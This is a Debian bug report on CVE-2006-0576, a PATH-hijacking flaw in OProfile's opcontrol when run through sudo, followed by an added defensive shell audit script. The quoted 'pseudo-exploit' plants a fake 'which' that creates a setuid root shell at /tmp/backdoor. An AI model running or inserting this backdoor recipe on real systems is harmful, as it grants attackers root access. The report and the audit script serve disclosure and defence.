Package: oprofile
Severity: normal

CVE-2006-0576 reads:

Untrusted search path vulnerability in opcontrol in OProfile 0.9.1 and earlier allows local users to execute arbitrary commands via a modified PATH that references malicious (1) which or (2) dirname programs. NOTE: while opcontrol normally is not run setuid, a common configuration suggests accessing opcontrol using sudo. In such a context, this is a vulnerability.

Giving sudo to oprofile is apparently a very common practice.

From the original report:

Whoever coded the script tried protecting it against executing binaries out of a safe PATH by defining one on line 1416:

    PATH=/usr/local/bin:/usr/local/sbin:/bin:/sbin:/usr/bin:/usr/sbin

The problem is that this script does not check where the 'which' or 'dirname' binary is executed from on line 1413/1414. This enables a malicious user to execute arbitrary code by using the following pseudo'exploit':

    cat > which
    #!/bin/sh
    /bin/cp /bin/bash /tmp/backdoor
    /bin/chmod 6755 /tmp/backdoor
    ^C
    set PATH="."
    /usr/bin/sudo /usr/local/bin/opcontrol

This is a relatively low severity vulnerability, but easily fixed.

-- System Information:
Debian Release: testing/unstable
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.15-1-686-smp
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)
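A review-time check for the ordering problem the report describes, as an added example that is not part of the original report or of OProfile: it lists bare `which`/`dirname` calls that a script makes before it pins PATH. The function names and the sample script are hypothetical and constructed for illustration; the sample is not the real opcontrol.

```shell
#!/bin/sh
# Added example (not OProfile code): heuristic audit for PATH-dependent
# lookups that run before a script assigns its own safe PATH.

# Print "LINE:COMMAND" for every unqualified which/dirname invocation found
# before the first PATH= assignment in the script given as $1.
find_unpinned_lookups() {
    awk '
        /^[ \t]*#/ { next }                      # ignore comment lines
        /^[ \t]*(export[ \t]+)?PATH=/ { exit }   # PATH pinned: later calls are fine
        {
            line = $0
            # A bare name follows start-of-line or a shell separator; a name
            # preceded by "/" is an absolute path and is not reported.
            while (match(line, /(^|[ \t`(;|&])(which|dirname)([ \t]|$)/)) {
                tok = substr(line, RSTART, RLENGTH)
                gsub(/[^a-z]/, "", tok)          # strip the separators
                print NR ":" tok
                line = substr(line, RSTART + RLENGTH)
            }
        }
    ' "$1"
}

# Write a constructed script with the same shape as the reported flaw:
# two lookups resolved through the caller's PATH, then the PATH assignment.
make_sample() {
    cat > "$1" <<'EOF'
#!/bin/sh
# constructed sample, not the real opcontrol
SELF=`which $0`
DIR=`dirname $SELF`
PATH=/usr/local/bin:/usr/local/sbin:/bin:/sbin:/usr/bin:/usr/sbin
BASE=`dirname /tmp/x`
EOF
}

# Demo: audit the constructed sample and print the findings.
tmp=$(mktemp) && make_sample "$tmp" && find_unpinned_lookups "$tmp"
rm -f "$tmp"
```

Moving the PATH assignment above the first external command, or calling the helpers by absolute path, makes the audit come back empty.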